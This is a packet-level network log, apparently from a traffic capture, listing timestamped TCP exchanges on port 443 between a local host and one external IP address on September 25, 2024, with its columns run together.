                                                                              Sep 25, 2024 19:02:14.574573040 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.574609041 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.574620962 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.574650049 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.574667931 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.574791908 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.574835062 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.574888945 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.574898958 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.574924946 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.574963093 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.575263023 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.575340033 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.575351000 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.575444937 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.575444937 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.575444937 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.575455904 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.575480938 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.575508118 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.575539112 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:34.519198895 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:34.519313097 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:34.519459009 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:34.527879000 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:34.527923107 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.008502960 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.008608103 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.010284901 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.010313988 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.011089087 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.018120050 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.063405037 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.132036924 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.132112026 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.132194042 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.132224083 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.186919928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.233947039 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.233982086 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.234047890 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.234066010 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.234092951 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.234122038 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.234138966 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.234158039 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.234230042 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.235865116 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.235924959 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.235946894 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.235970974 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.236001968 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.236040115 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.321899891 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.322006941 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.322021008 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.322043896 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.322072029 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.322092056 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.323276043 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.323338985 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.323396921 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.323419094 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.323448896 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.323472023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.325175047 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.325238943 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.325263023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.325277090 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.325308084 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.325328112 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.407532930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.407613993 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.407656908 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.407687902 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.407721996 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.407746077 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.408551931 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.408616066 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.408642054 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.408655882 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.408750057 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.408768892 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.409571886 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.409627914 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.409651995 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.409666061 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.409692049 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.409712076 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.411276102 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.411345005 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.411367893 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.411381006 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.411429882 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.411480904 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.412378073 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.412435055 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.412477016 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.412489891 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.412516117 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.412552118 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.414153099 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.414207935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.414247036 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.414259911 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.414287090 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.414323092 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.494646072 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.494729042 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.494785070 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.494801044 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.494858980 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.494904041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.494910002 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.494946957 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.494981050 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495013952 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495014906 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495039940 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495100021 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495215893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495270014 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495297909 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495311975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495342970 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495363951 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495522976 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495590925 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495632887 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495645046 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.495692015 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.495712996 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501348972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501435041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501487017 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501499891 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501570940 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501595974 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501625061 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501682043 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501715899 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501744032 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501775980 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501807928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.501919031 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.501985073 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.502015114 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502027988 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.502059937 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502079964 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502520084 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.502600908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.502621889 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502635002 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.502664089 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502682924 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.502700090 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.515018940 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.586679935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.586781979 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.586791992 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.586811066 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.586849928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.586903095 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587003946 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587059975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587093115 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587105036 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587146997 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587177038 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587227106 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587296963 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587328911 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587341070 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587400913 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587400913 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587743998 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587804079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587837934 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587851048 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587903023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587938070 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.588665009 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.588721037 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.588762045 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.588774920 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.588812113 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.588851929 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589159012 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589224100 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589250088 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589262962 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589298964 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589332104 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589572906 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589637041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589674950 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589687109 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589725971 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589755058 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.590090036 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.590156078 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.590193033 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.590205908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.590249062 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.590266943 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.681652069 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.681727886 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.681830883 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.681855917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.681937933 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.681972980 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686451912 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686516047 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686558008 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686572075 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686602116 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686628103 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686877966 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686934948 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686970949 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686984062 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687022924 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687048912 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687618017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687676907 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687709093 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687721014 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687751055 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687791109 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694114923 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694138050 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694247007 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694262981 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694336891 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694610119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694631100 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694708109 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694721937 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694792986 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.695002079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.695020914 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.695099115 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.695112944 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.695178032 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.698889017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.698946953 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.699028015 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.699042082 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.699114084 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.771541119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.771600008 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.771646023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.771682024 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.771703005 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.771743059 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.773904085 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.773967028 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.773993969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.774003983 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.774040937 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.774068117 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.779556990 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.779613972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.779638052 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.779648066 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.779685020 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.779712915 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.780706882 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.780761003 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.780806065 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.780819893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.780848026 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.780915976 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794593096 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794675112 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794703007 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794723034 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794753075 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794785023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794914007 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794967890 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795008898 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795022011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795059919 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795101881 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795770884 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795847893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795874119 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795887947 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795947075 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795984983 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.797266006 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.797337055 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.797364950 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.797378063 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.797405005 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.797441006 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.857741117 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.857814074 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.857848883 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.857947111 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.857995987 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.858023882 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.860189915 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.860246897 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.860277891 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.860328913 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.860371113 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.860397100 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865149975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865240097 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865251064 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865272999 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865304947 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865333080 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865827084 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865894079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865922928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865931034 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865958929 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865983009 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.882858038 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.882916927 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.882960081 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.882988930 CEST4434970579.141.163.131192.168.2.16
